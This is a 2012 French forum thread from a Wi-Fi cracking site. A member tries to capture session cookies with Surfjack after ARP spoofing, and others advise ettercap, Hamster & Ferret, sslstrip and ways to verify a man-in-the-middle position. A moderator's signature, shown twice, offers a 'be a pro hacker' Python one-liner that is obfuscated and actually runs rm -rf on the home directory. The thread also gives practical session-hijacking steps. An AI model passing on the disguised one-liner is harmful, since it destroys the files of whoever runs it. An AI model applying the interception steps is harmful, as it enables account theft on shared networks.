Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 21-08-2012 22:04:47

Gargoul
Membre

surfjack, question d'encryption ?

Bonsoir a tous !

Jai effectivement suivit le tuto a la lettre, sur mon reseau wifi encrypter en WPA. Mon but etant d'essayer de recuperer mes cookie. Parametrage nickel, man in the middle sur la machine ciblée et surfjack lancer. Connection facebook, gmail, msn, et tout le tinticouinti mais...aucun cookie de reçus, console surfjack vierge sans aucune activiter presente.Je me dit peut alors que google chrome contournerai cette attaque ? je décide d'installer IE mais même problème... je me demande alors si le probléme ne viendrais pas du type d'encryption de mon reseau wifi qui est le wpa ???

Merci !

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 21-08-2012 22:11:37

spawn
Modérateur

Re : surfjack, question d'encryption ?

Gargoul a écrit :

Parametrage nickel, man in the middle sur la machine ciblée

donc pas de soucis.
Cela vient sûrement de ton utilisation de surfjack.

@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

#3 21-08-2012 22:51:30

antares145
Membre d'honneur
Site Web

Surfjack travaille directement à la couche IP (enfin, quelque part entre l'ARP et le TCP, voire au dessus). Donc ça veut dire que la sécurité des couches inférieures n'a aucune importance. La "segmentation" des protocoles réseau se base sur l'abstraction : Surfjack peut se baser sur la couche IP sans savoir ce qu'il y a en dessous. Que ce soit de l'ethernet (câblé), du WiFi, de la 3G (plus complexe à déployer là) ou même du IPoAC, ça ne change rien.

Tout ça pour dire que la sécurité du réseau WiFi n'a aucune influence sur surfjack, dès lors que tu fais déjà partie du même LAN que ta cible. Note qu'il y a un moyen simple de vérifier si tu ne me crois pas, passe ton réseau en OPN et refais le test smile

Par contre je ne vois pas trop où est le problème dans ton cas, mais je connais assez mal surfjack (je travaillais plutôt avec wifizoo à l'époque). Tu peux essayer Hamster & Ferret pour le vol de cookies, tu auras peut-être plus de chance. Une idée au passage : Facebook, Gmail et MSN sont probablement sur des connexions HTTPS, ça par contre ça peut être un problème pour Surfjack wink

#4 22-08-2012 14:13:48

Gargoul
Membre

Effectivement, je n'avais pas du tout penser au SSL hmm il faudrait que j'essaie sur d'autre domaine. Mais du coup en y réfléchissant sa limite le rayon d'action c'est foutu https.

Peut-être que ma commande arpspoof est mauvaise ?

arpspoof -i wlan0 -t 192.168.1.44 192.168.1.21

1.44 = ip Machine ciblée
1.21 =  ip Machine qui host Surfjack

Elle est ok ?

Je vais de suite voir ce que ça donne du coté de Hamster & Ferret, merci Antares.

Dernière modification par Gargoul (22-08-2012 14:17:34)

#5 22-08-2012 15:11:36

spawn
Modérateur

une question  = un topic.
pose ta question sur arpspoof dans un autre topic (:

si tu es en MITM tu peux utiliser sslstrip.

@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

#6 22-08-2012 22:29:56

Gargoul
Membre

spawn a écrit :

une question  = un topic.
pose ta question sur arpspoof dans un autre topic (:

si tu es en MITM tu peux utiliser sslstrip.

Pourquoi recréer un sujet alors que le problème a traiter reste le même ? En plus, pour les membres ce serait plus simple de trouver rapidement une réponse si il ce trouve confronter au même problème...

Sinon je me suis remis au problème de surfjack et j'ai trouver la solution.
J'ai laisser tomber arpspoof pour le remplacer par ettercap et maintenant ça marche du feu de dieu !
peut-être un soucis matériel qui rend incompatible arpspoof...

Je recréer un sujet sur sslstrip car celui ci ne fonctionne pas non plus.

Merci a tous, plus particulierement a antares, tes conseil sont précieux.

#7 22-08-2012 22:42:29

antares145
Membre d'honneur
Site Web

Arpspoof ne fonctionnerait donc plus... Intéressant...
Enfin, faudrait vérifier qu'il ne fonctionne pas, en regardant le cache ARP de la victime (commande "arp -a", l'adresse IP du routeur doit correspondre à la MAC de ta machine attaquante). Je penche pour un problème de cache ARP justement, où la victime connaît déjà l'adresse MAC du routeuret ne la demande pas (elle ignore donc les ARP que tu envoies). Peut-être que l'essai que tu as fait avec Ettercap est tombé juste au bon moment pour pourrir sa table ARP, ou peut-être qu'Ettercap est meilleur que Arpspoof smile
Au passage, il y a un moyen "simple" de vérifier si tu es bien en MITM ou pas : tu lances Wireshark sur la machine attaquante et tu regardes si tu vois passer le trafic de la victime (ça marche aussi avec tcpdump en ligne de commande, plus rapide) wink

Par contre ça me "rassure" (arf !) de voir que Facebook, Gmail & co ne sécurisent toujours pas leurs cookies roll Le MacDonalds-sniffing a encore de beaux jours devant lui...

De rien pour mes "conseils", même si ici ils ne t'ont servi à rien tongue

#8 22-08-2012 23:16:50

Gargoul
Membre

j'ai hormis de préciser que arpspoof ne changer en rien ma table arp sur ma machine attaquer alors qu'avec ettercap c'est tout bon.
Par contre, j'ai pas essayer facebook mais gmail sous surfjack ça passe pas. J'ai tenter sous sslstrip mais ça tourne pas... quand j'aurais un peux de temps je me pencherais plus sérieusement sur le problème.

#9 23-08-2012 07:00:41

Caracole
Membre Actif

Le problème, pour sslstrip, et d'ailleurs je pense que c'est la même chose pour surfjack, c'est qu'il te faut au moins une page en http avant de basculer en https. Donc à mon avis c'est pour cela que ça ne fonctionne pas avec Gmail.

#10 23-08-2012 11:38:06

Gargoul
Membre

Caracole a écrit :

Le problème, pour sslstrip, et d'ailleurs je pense que c'est la même chose pour surfjack, c'est qu'il te faut au moins une page en http avant de basculer en https. Donc à mon avis c'est pour cela que ça ne fonctionne pas avec Gmail.

Ce qui veux dire ?

Annonce